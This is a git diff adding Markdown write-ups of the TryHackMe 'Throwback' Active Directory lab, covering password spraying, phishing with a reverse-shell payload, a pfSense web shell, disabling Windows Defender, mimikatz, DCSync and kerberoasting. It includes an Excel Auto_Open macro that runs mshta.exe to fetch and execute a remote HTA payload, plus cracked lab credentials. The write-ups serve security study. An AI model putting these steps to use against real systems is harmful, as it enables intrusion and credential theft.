diff --git a/TryHackMe/Throwback/THROWBACK-CORP-ADT01.md b/TryHackMe/Throwback/THROWBACK-CORP-ADT01.md
new file mode 100644
index 0000000..9c7803f
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-CORP-ADT01.md
@@ -0,0 +1,20 @@
+# TryHackMe-THROWBACK-CORP-ADT01 (10.200.34.243)
+
+
+We found credentials for `DaviesJ` but we won't be able to login we need to run autoroute on CORP-DC01
+
+
+
+Open a meterpreter session on CORPORATE-ADT01
+
+
+
+
+
+
+
+
+
+In `dosierk` 's documents we find a note
+
+
diff --git a/TryHackMe/Throwback/THROWBACK-CORP-DC01.md b/TryHackMe/Throwback/THROWBACK-CORP-DC01.md
new file mode 100644
index 0000000..82dfe87
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-CORP-DC01.md
@@ -0,0 +1,28 @@
+# TryHackMe-THROWBACK-CORP-01(10.200.34.118)
+
+We can login with MercerH's credentials as this domain is trusted by THROWBACK.LOCAL but in order to do we need to run `autoroute` on DC because we cannot reach CORP domain through PROD
+
+
+
+Here I downloaded meterpreter backdoor
+
+
+
+
+
+Now we have to remove route from previous sessions which in my case is `6` so I will use autoroute and `SET CMD delelte, SET SESSION 6` and then run it. After that I will `SET CMD autoadd , SET SESSION 7` and run the module
+
+
+
+
+
+
+
+
+
+
+
+Add both the domain names in /etc/hosts file
+
+
+
diff --git a/TryHackMe/Throwback/THROWBACK-CORP-MAIL.md b/TryHackMe/Throwback/THROWBACK-CORP-MAIL.md
new file mode 100644
index 0000000..386ca91
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-CORP-MAIL.md
@@ -0,0 +1,16 @@
+# TryHackMe-THROWBACK-CORP-MAIL
+
+On searching Throwback Hacks github I found a link to there repository
+
+
+
+
+
+
+
+Seeing the commit history of the file `db_connect.php` we can find credentials
+
+
+
+
+
diff --git a/TryHackMe/Throwback/THROWBACK-DC01.md b/TryHackMe/Throwback/THROWBACK-DC01.md
new file mode 100644
index 0000000..e278beb
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-DC01.md
@@ -0,0 +1,64 @@
+# TryHackMe-THROWBACK-DC01(10.200.34.117)
+
+
+
+I used SSH to log on the domain controller
+
+
+
+We can see that we are a normal domain user on this machine so we need to escalate our privileges and the only way to enumerate AD is to use bloodhound so by using the same loot we got from WS-01 we are going to utilize it
+
+Using the query `Find Principals with DCSync Rights`
+
+
+
+Going into to the documents of jeffersd we find a notice
+
+
+
+Here there's a backup account password and we already found that `backup` has DCsync rights
+
+```
+DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller(DC) in order to retrieve password data via domain replication
+```
+
+By running secretsdump.py we dumped hashes from NTDS.dit
+
+
+
+Now we have a bunch of user hashes but the problem how we can we know which user to target as we need to escalate our privileges so running a command `net localgroup` to see available groups on AD
+
+
+
+We can see there's a group `Administrators`
+
+
+
+So we need to crack `MercerH` 's hash
+
+
+
+To crack the hash we will be using a rules in `hashcat`
+
+
+
+
+
+Simply ssh with the current logged in user
+
+`ssh MercerH@localhost`
+
+
+
+And you can see we are now a privleged user
+
+
+```
+THROWBACK.local\MercerH:pikapikachu7
+JeffersD:Throwback2020
+```
+
+Going back to bloodhound we can see that THROWBACK.LOCAL domain is trusted by CORPORATE.LOCAL
+
+
+
diff --git a/TryHackMe/Throwback/THROWBACK-FW01.md b/TryHackMe/Throwback/THROWBACK-FW01.md
new file mode 100644
index 0000000..8b4f996
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-FW01.md
@@ -0,0 +1,102 @@
+# TryHackMe-THROWBACK-FW01(10.200.34.138)
+
+## NMAP
+
+```
+Nmap scan report for 10.200.34.138
+Host is up, received echo-reply ttl 63 (0.18s latency).
+Scanned at 2021-02-20 14:40:52 PKT for 219s
+Not shown: 65531 filtered ports
+Reason: 65531 no-responses
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack ttl 63 OpenSSH 7.5 (protocol 2.0)
+| ssh-hostkey:
+| 4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)
+|_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDN6yAJkDf3ePS4Etb1KKfEe6Az22BPADTvyCijKGexA0/xVVqwbhlLdXRf8lsGIyxOrEA/VZx7yq+iYL+tW8fnItuLaco6YTDJbtK8V0FQCFTyfCINNKH/jYABwG1i6TkZnaneAXKby8snChez7+r1Bz1fPzxne4PTrvBazH58jHV5A3y+xgskcZct8LnGnaib4LoAtXgd+t1sVjv+BHbpevCbSHNxhqb4S/Vsja2XTr37U1SXnst6xRTqRHal1ziq08Ijzxm17I5bUY6wRZRv01IZCWdE9JHaoVbkHtMOPMAsOsg99fXnb8I++jruuFWJbNQ26/1rwMqeaIslpAsKsFijCe5IbXwvKuzI6A9sM0IYObV+CevgYraQ7G4zx+WeBUIqu8dOt16n4suz33kaI17jbBdfSR6GxdT3ysqEsSkLd6p0HIR0JxIk5t7qGhG9KSvfsk42JUMyoocbK3tO8O/xInXPSuBWiohcGz0aJckVIOJuQSm8dkGRj62yOfzSyh9utWWu8Zi/dngRR6qOCMz538aQ/DReNEgqXl0Zn2roj42scFhidj4VgO0vhClotAmOZrFhu3wXc91ImkTdvApK7XcAQ4NGIt8kf0TylvHkV8T39zOB2uoFgITShRqHUQ6AnxwivFkdbdALT2IWh3CJRVD4Vwwog5L4ohsDjw==
+53/tcp open domain syn-ack ttl 63 (generic dns response: REFUSED)
+80/tcp open http syn-ack ttl 63 nginx
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-title: Did not follow redirect to https://10.200.34.138/
+|_https-redirect: ERROR: Script execution failed (use -d to debug)
+443/tcp open ssl/http syn-ack ttl 63 nginx
+|_http-favicon: Unknown favicon MD5: 5567E9CE23E5549E0FCD7195F3882816
+| http-methods:
+|_ Supported Methods: GET HEAD POST
+|_http-title: pfSense - Login
+| ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
+| Subject Alternative Name: DNS:pfSense-5f099cf870c18
+| Issuer: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2020-07-11T11:05:28
+| Not valid after: 2021-08-13T11:05:28
+| MD5: fe06 fa47 4d83 8454 e67a 1840 7ea8 d101
+| SHA-1: 672e 5f8f 9b28 7cad 5789 c5be cb1c f3f2 6c63 dfb2
+|_-----END CERTIFICATE-----
+```
+
+### PORT 80 (HTTP)
+
+
+
+We can see that there is a login page to pfsense control panel. I decided to try default credentials
+
+
+
+These credentials logged us in
+
+
+
+When logged in we can see `Diagnostics` tab and we see menu `Command Prompt`
+
+
+
+
+
+
+
+We can see that commands will be executed as `root`
+
+
+
+Also php commands can be executed. I uploaded a `phpbash` which is like a backdoor having a full interactivev shell
+
+`https://github.com/Arrexel/phpbash`
+
+
+
+
+
+We can get the root flag in `/root/root.txt`
+
+
+
+We can find logs for in `/usr/local/www`
+
+
+
+And we can get this this username and hash
+
+`HumphreyW:1c13639dba96c7b53d26f7d00956a364`
+
+I search for the log flag by running recusrive find command in `/var/log`
+
+
+
+
+Now the hash that we got for the user `HumphreyW` we need to crack it but we need to know what type of hash it is so I went to `Name That Hash`
+
+
+
+It gave me a bunch of hash type for it so I checked for MD5 and MD4 that was a negative
+
+I started `hashcat` for NTLM (1000)
+
+
+
+And it was cracked
+
+
+
diff --git a/TryHackMe/Throwback/THROWBACK-MAIL.md b/TryHackMe/Throwback/THROWBACK-MAIL.md
new file mode 100644
index 0000000..2d021ec
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-MAIL.md
@@ -0,0 +1,103 @@
+# TryHackMe-THROWBACK-MAIL (10.200.34.232 )
+
+## NMAP
+
+```
+Nmap scan report for 10.200.34.232
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 3b:b1:4c:b7:3f:fc:3e:ec:83:0f:0e:db:bf:25:9a:01 (RSA)
+| 256 76:62:f3:eb:94:08:bc:a8:34:53:44:4d:ec:ac:87:f1 (ECDSA)
+|_ 256 0b:80:aa:78:66:34:43:09:db:99:98:e1:99:7e:a8:b0 (ED25519)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+| http-title: Throwback Hacks - Login
+|_Requested resource was src/login.php
+143/tcp open imap Dovecot imapd (Ubuntu)
+|_imap-capabilities: Pre-login IDLE LOGINDISABLEDA0001 SASL-IR more capabilities have ID post-login listed OK IMAP4rev1 STARTTLS ENABLE LOGIN-REFERR
+ALS LITERAL+
+| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
+| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
+| Not valid before: 2020-07-25T15:51:57
+|_Not valid after: 2030-07-23T15:51:57
+|_ssl-date: TLS randomness does not represent time
+993/tcp open ssl/imap Dovecot imapd (Ubuntu)
+|_imap-capabilities: Pre-login IDLE SASL-IR more capabilities have ID post-login IMAP4rev1 OK AUTH=PLAINA0001 listed ENABLE LOGIN-REFERRALS LITERAL+
+| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
+| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
+| Not valid before: 2020-07-25T15:51:57
+|_Not valid after: 2030-07-23T15:51:57
+|_ssl-date: TLS randomness does not represent time
+```
+
+### PORT 80 (HTTP)
+
+
+
+We can login with the guest credentials which are
+
+`tbhguest:WelcomeTBH1!`
+
+
+
+We can get our first flag form the inbox
+
+
+
+Going to `Addresses` tab we can see a list of usernames and emails
+
+
+
+Now intercept the login request in order to start bruteforce attack so we can use these parameters in `hyda`
+
+
+
+We have the usernames but don't have the passwords but it was told that some accounts might use weak credentials so I crafted some passwords
+
+```
+Summer2020
+Management2020
+Management2018
+Password2020
+ThrowbackHacks2020
+Throwback202
+Password123
+Winter2020
+Winter2018
+Spring2020
+Winter2019
+Summer2018
+Summer2019
+```
+
+
+
+
+```
+login: PeanutbutterM password: Summer2020
+login: DaviesJ password: Management2018
+login: GongoH password: Summer2020
+login: MurphyF password: Summer2020
+login: JeffersD password: Summer2020
+```
+
+We logged in as guest again because it had the email addresses of all users and we wanted to send to everyone
+
+
+
+Generate a staged payload for catching reverse shell through metasploit
+
+
+
+
+
+Attatched the payload in email
+
+
+
+After sending the email I wait for some time a got a metepreter session
+
+
+
+
\ No newline at end of file
diff --git a/TryHackMe/Throwback/THROWBACK-PROD.md b/TryHackMe/Throwback/THROWBACK-PROD.md
new file mode 100644
index 0000000..476652e
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-PROD.md
@@ -0,0 +1,238 @@
+# TryHackMe-THROWBACK-PROD(10.200.34.219)
+
+## NMAP
+
+```
+Nmap scan report for 10.200.34.219
+Host is up (0.19s latency).
+Not shown: 993 filtered ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
+| ssh-hostkey:
+| 2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)
+| 256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)
+|_ 256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)
+80/tcp open http Microsoft IIS httpd 10.0
+| http-methods:
+|_ Potentially risky methods: TRACE
+|_http-server-header: Microsoft-IIS/10.0
+|_http-title: Throwback Hacks
+135/tcp open msrpc Microsoft Windows RPC
+139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+445/tcp open microsoft-ds?
+3389/tcp open ms-wbt-server Microsoft Terminal Services
+| rdp-ntlm-info:
+| Target_Name: THROWBACK
+| NetBIOS_Domain_Name: THROWBACK
+| NetBIOS_Computer_Name: THROWBACK-PROD
+| DNS_Domain_Name: THROWBACK.local
+| DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local
+| DNS_Tree_Name: THROWBACK.local
+| Product_Version: 10.0.17763
+|_ System_Time: 2021-02-22T17:08:55+00:00
+| ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local
+| Not valid before: 2021-02-21T16:52:43
+|_Not valid after: 2021-08-23T16:52:43
+|_ssl-date: 2021-02-22T17:09:35+00:00; +13s from scanner time.
+5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Service Unavailable
+Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+Host script results:
+|_clock-skew: mean: 12s, deviation: 0s, median: 12s
+| smb2-security-mode:
+| 2.02:
+|_ Message signing enabled but not required
+| smb2-time:
+| date: 2021-02-22T17:08:58
+|_ start_date: N/A
+
+```
+
+### PORT 80 (HTTP)
+
+
+
+Since this host has AD running so we can run a tool called `responder` to start an attack called LLMNR/NBT-NS poisoning
+
+
+
+
+
+I ran this tool for 2 days and it didn't gave me the hash , there was a problem in Throwbacks network so I had to continue looking up the writeups
+
+### Remmina
+
+Since this windows machine has port 3389 open which is for `Remote Desktop Protocol` we can login with PetersJ's passoword which is `Throwback317`
+
+
+
+
+
+### Installing Starkiller
+
+Starkiller is C2 (Command and Control) frontend interface for "Empire" used for post exploitation without interfereing with the actual machine it self. It is used for enumeration and for identifiying privilege escalation vectors so for that we need to have `starkiller` and `empire`
+
+
+
+
+
+
+Now we have to `chmod +x starkiller-1.3.2.AppImage` and `./starkiller-1.3.2.AppImage --no-sandbox`
+
+
+
+We will be presented with a login prompt
+
+
+
+### Installing Empire
+
+Empire is great tool similar to meatsploit for post exploitation and information gathering used on windows machines
+
+Run `git clone https://github.com/BC-SECURITY/Empire.git`
+
+
+
+Run `install.sh`
+
+
+
+This installation would take a long time. So going back to starkiller we log in with the credentials `empireadmin:passowrd123` and we need to make this application listen on defualt port which is `1337` leet but in order login we want empire to be running
+
+
+
+
+
+So our installation for empire is complete but still we need to install some dependencies
+
+`pip3 install poetry` and `poetry install` then `poetry run python empire`
+
+
+
+One last thing to do `pip3 install click` and when you run `powershell-empire`
+
+
+
+And it works but we need to use it with `--rest`,so
+
+
+
+By using this option it will use the default ports and will allow us to use frontend which starkiller
+
+
+
+
+
+On logging in with the default credentials above
+
+
+
+Now we are going to create our listener
+
+
+
+We have our listener created
+
+
+
+Now we need to create our stager which is the payload we are going to transfer on the target machine
+
+
+
+
+
+
+
+
+
+Click on the download or save icon to save the payload somewhere on your local machine and then start a python3 http server to host it in order to download it from the target machine
+
+
+
+The web server is running
+
+
+
+We have that on the target machine all we need to do is launch the payload
+
+On launching we will see some information regarding the target machine in the `agents` section
+
+
+
+We can see that starkiller is acting like C2 server which sends commands on the target machine and we can see the output over the GUI
+
+
+
+Run `seatbelt` module
+
+
+
+
+
+This module did enumeration for us a found a user with a saved credential
+
+
+
+
+
+Now we have logged in as `admin-petersj` in order to dig deep we have to run mimikatz but for that we need to create another listener and stager in order to run c2 commands as elevated user
+
+
+
+
+
+
+
+On running this payload again
+
+
+
+Now we need to run `mimikatz` module through our C2
+
+
+
+Running `privilege::debug` will give us a status `OK` means we can escalate our privileges to NT-AUTHORITY
+
+
+
+
+
+We ran the command and notice if scroll down a little be we can see the password hashes of the users
+
+
+
+There's a feature in Starkiller which can save all the credentials or hashes found in a neat way
+
+
+
+Now we have the credentials but don't know on which host these credentials are valid so we are going to something called` Pass The Hash` a realy attack for that we need to run `proxychains` or `autoroute` for that we need to have meterepreter session
+
+
+
+
+
+
+
+
+
+
+
+Install `Crackmapexec`
+
+https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation#binaries
+
+
+
+We can see that we can ping the ohter machines as well so the task says that the hash from task 10 will work which was from `HumprehyW` 's hash and the other from the list of credentials we dumped using mimikatz
+
+
+
+
+
+
+PetersJ:Throwback317
+
+runas /savecred /user: /profile "cmd.exe"
+
+use auxiliary/server/socks4a
\ No newline at end of file
diff --git a/TryHackMe/Throwback/THROWBACK-SEC-BREACH.md b/TryHackMe/Throwback/THROWBACK-SEC-BREACH.md
new file mode 100644
index 0000000..f2b34e5
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-SEC-BREACH.md
@@ -0,0 +1,41 @@
+# TryHackMe-THROWBACK-SEC-BREACH
+
+Now we need to run this tool `LeetLinked`
+
+
+
+This returned as a list of emails
+
+
+
+But we need to convert the format which found from a note in dosierk's documents. So we will be using `namely` to generate emails in a proper format using names we found from `leetlinked`
+
+
+
+
+
+Now this in HRE format but there are other formats as well
+
+
+
+
+
+In this I generated a list of potential emails now only thing left for us to do is to visit `breachgtfo.local` and check for breached emails
+
+
+
+We can use `wfuzz` to check for response length
+
+
+
+We get the same amount of Characters so we can hide `4950` and see if there are characters with a length other than that
+
+
+
+And we have found a request with different characters
+
+
+
+Now if we try to login on thier corporate mail
+
+
s
\ No newline at end of file
diff --git a/TryHackMe/Throwback/THROWBACK-TBSEC-DC01.md b/TryHackMe/Throwback/THROWBACK-TBSEC-DC01.md
new file mode 100644
index 0000000..f51ab87
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-TBSEC-DC01.md
@@ -0,0 +1,55 @@
+# TryHackMe-THROWBACK-TBSEC-DC01
+
+We have the credentials from the email
+
+`TBSEC_GUEST:WelcomeTBSEC1!`
+
+But in order to login I tried using `win-rm` and `ssh` both failed then I tried with RDP and got access
+
+
+
+
+
+Run `powershell-empire --rest` and `starkiller`
+
+
+
+
+
+We have our listener ready
+
+
+
+For setting a stager
+
+
+
+
+
+Now we need to deliver this bat file to target
+
+
+
+
+
+
+
+Run the built in rubeus from starkiller
+
+
+
+
+
+You can easily transfer the file by simpling clicking Download icon
+
+
+
+
+
+On running hashcat we will crack the hash
+
+
+
+We can now login through RDP with that account
+
+
diff --git a/TryHackMe/Throwback/THROWBACK-TIME.md b/TryHackMe/Throwback/THROWBACK-TIME.md
new file mode 100644
index 0000000..3d57c3c
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-TIME.md
@@ -0,0 +1,112 @@
+# TryHackMe-THROWBACK-TIME(100.20.34.176)
+
+Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine
+
+
+
+So we can access the web page
+
+
+
+Going back to MAIL machine to get reset link by logging in as `MurhphyF`
+
+
+
+
+
+murphyf
+PASSWORD
+
+Now we need to update our `/etc/hosts` file
+
+
+
+We updated the password through the reset link and can login with those
+
+
+
+Create a microsoft execl macro document having this macro in it using metasploit hta server
+
+
+
+```
+Sub HelloWorld()
+ PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
+End Sub
+
+Sub Auto_Open()
+ HelloWorld
+End Sub
+```
+
+Where that .hta is generated through metasploit
+
+
+
+Upload that document
+
+
+
+You will get a shell
+
+
+
+
+
+By typing `sysinfo`
+
+
+
+We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command `ps` to check currently running processes
+
+
+
+Here we need to identify the process which is running as `NT AUTHORITY\SYSTEM` also running as a 64 bit
+
+
+
+So we see this statisfying our requirements
+
+
+
+And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture
+
+
+
+We can now run commands like mimikatz , hashdump
+
+
+
+We have successfully dumped the hashes of the accounts on this machine
+
+
+
+Using proxychains we ssh with `Timekeeper's` credentials
+
+
+
+Switch to directory where mysql.exe is
+
+
+
+Using the password from the kerberoasted mysql service account
+
+
+
+
+
+
+
+
+
+
+
+Save the list of usernames you found from `domain_users` database
+
+
+
+We can utilize the same list of passwords we used to get access to Throwbacks mail
+
+
+
+
\ No newline at end of file
diff --git a/TryHackMe/Throwback/THROWBACK-WS01.md b/TryHackMe/Throwback/THROWBACK-WS01.md
new file mode 100644
index 0000000..a4cbd57
--- /dev/null
+++ b/TryHackMe/Throwback/THROWBACK-WS01.md
@@ -0,0 +1,103 @@
+# TryHackMe-THROWBACK-WS01 (10.200.34.222)
+
+## NMAP
+
+```
+No ports open on this machine
+```
+
+We can get `user.txt` flag from here
+
+
+
+And for `root.txt`
+
+
+
+Since we have ran `autoroute` on `THROWBACK-WS01` we can access machines on the network as we were not able to run nmap scan on this machine
+
+
+
+
+
+We can ssh into the machine with BlaireJ's plain text password
+
+
+
+Now that we have gained inital foothold on WS-01 again we need to do some enumeration with `Bloodhound`.
+
+After installing it on kali machine we can the GUI interface on browser
+
+
+
+
+
+Now we need to download a file called `Sharphound.ps1` a powershell script to be transfered on WS-01 machine
+
+https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
+
+To run the script we need to disable antivirus or windows defender on the target machine
+
+https://www.itechtics.com/enable-disable-windows-defender/
+
+`Set-MpPreference -DisableRealtimeMonitoring $true`
+
+
+
+Then run this command to get a map of the AD environment
+
+`Invoke-Bloodhound -CollectionMethod All -Domain THROWBACK.local -ZipFileName loot.zip`
+
+
+
+
+
+Now we need to get this `20210227114234_loot.zip` on our machine
+
+I messed up with the credentials and didn't found a way to reset so I disabled the authentication
+
+`subl /etc/neo4j/neo4j.conf`
+
+
+
+
+
+Copy that zip file from the target to our local machine
+
+
+
+Simply drag and drop to bloodhound GUI and run quries example get all admins
+
+
+
+Run the query `Map Domain Trusts`
+
+
+
+
+Run the query `List all Kerberoastable Accounts`
+
+
+
+
+Run the query `Find Shortest Paths to Domain Admins`
+
+
+
+Now in order to get kerbroast ticket we need the impacket version 0.9.19
+
+https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19
+
+Reason is if we run with latest version
+
+
+
+We won't get the kerbroast ticket of SQLSERVICE account so on running with older version
+
+
+
+On getting that kerbroast hash we need to crack it using `hashcat`
+
+
+
+